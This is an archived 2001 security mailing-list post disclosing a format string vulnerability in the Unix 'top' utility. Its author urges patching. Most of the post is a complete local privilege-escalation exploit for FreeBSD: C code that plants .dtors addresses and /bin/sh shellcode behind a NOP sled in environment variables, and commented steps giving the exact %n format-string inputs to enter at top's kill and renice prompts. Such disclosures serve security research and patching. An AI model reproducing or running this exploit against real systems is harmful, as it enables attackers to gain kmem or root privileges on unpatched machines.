top format string bug exploit code (exploitable)

From: SeungHyun Seo (s1980914at_private)
Date: Wed Jul 25 2001 - 03:24:29 PDT

Next message: 3APA3A: "Sambar Server password decryption"

Previous message: Jonathan (Listserv Account): "RE: Oracle Vulnerability Discovered in OID"
Next in thread: Przemyslaw Frasunek: "Re: top format string bug exploit code (exploitable)"
Reply: Przemyslaw Frasunek: "Re: top format string bug exploit code (exploitable)"
Reply: David Brownlee: "Re: top format string bug exploit code (exploitable)"
Reply: Lupe Christoph: "Re: top format string bug exploit code (exploitable)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

hi.
 
It still seems to be affected under 3.5beta9 (including this version)
someone said it's not the problem of exploitable vulnerability about 8 month ago ,
but it's possible to exploit though situation is difficult.
following code and some procedure comments demonstrate it.
 
possible to get kmem priviledge in the XXXXBSD which is still not patched,
possible to get root priviledge in solaris .
( have to guess return address in solaris, cuz of 0x08040000 .text region occurs segfault.)
 
i didn't test it on all other systems ... so check your systems now and if possible , do patch !
 
 
/* 
 * freebsd x86 top exploit
 * affected under top-3.5beta9 ( including this version ) 
 * 
 * 1. get the address of .dtors from /usr/bin/top using objdump ,
 *
 *  'objdump -s -j .dtors /usr/bin/top'
 *
 * 2. divide it into four parts, and set it up into an environment variable like "XSEO="
 *
 * 3. run top, then find "your parted addresses from "kill" or "renice" command like this 
 *
 *  'k %200$p' or 'r 2000 %200$p'
 *
 * 4. do exploit !
 *
 *  'k %190u%230$hn' <== 0xbf (4)
 *  'k %190u%229$hn' <== 0xbf (3)
 *  'k %214u%228$hn' <== 0xd7 (2)
 *  'k %118u%227$hn' <== 0x77 (1)
 *
 * truefinder , seoat_private 
 * thx  mat, labman, zen-parse
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
#define NOP 0x90
#define BUFSIZE 2048
 
char fmt[]=
"XSEO="
/* you would meet above things from 'k %200$p', it's confirming strings*/
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS" 
/* .dtors's address in BSD*/
"\x08\xff\x04\x08" 
"\x09\xff\x04\x08"
"\x0a\xff\x04\x08"
"\x0b\xff\x04\x08" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
 
/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */
 
char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80"; /* bigwaks 23 bytes shellcode */
 
int 
main(void)
{
        char scbuf[BUFSIZE];
        char *scp;
 
        scp = (char*)scbuf;
        memset( scbuf, NOP, BUFSIZE );
 
        scp += ( BUFSIZE - strlen(sc) - 1);
        memcpy( scp, sc ,strlen(sc));
 
        scbuf[ BUFSIZE - 1] = '\0';
 
        memcpy( scbuf, "EGG=", 4);
 
        putenv(fmt);
        putenv(scbuf);
 
        system("/bin/bash");
}
 
 
 
++ 
Seo SeungHyun, Inha University Group of Research for Unix Security
IGRUS / khdp.org , Host / Network Security Laboratory, 4-207 
[e-mail] seoat_private , [Office] +82-32-860-8676 ( ROK )

Next message: 3APA3A: "Sambar Server password decryption"
Previous message: Jonathan (Listserv Account): "RE: Oracle Vulnerability Discovered in OID"
Next in thread: Przemyslaw Frasunek: "Re: top format string bug exploit code (exploitable)"
Reply: Przemyslaw Frasunek: "Re: top format string bug exploit code (exploitable)"
Reply: David Brownlee: "Re: top format string bug exploit code (exploitable)"
Reply: Lupe Christoph: "Re: top format string bug exploit code (exploitable)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 25 2001 - 08:33:09 PDT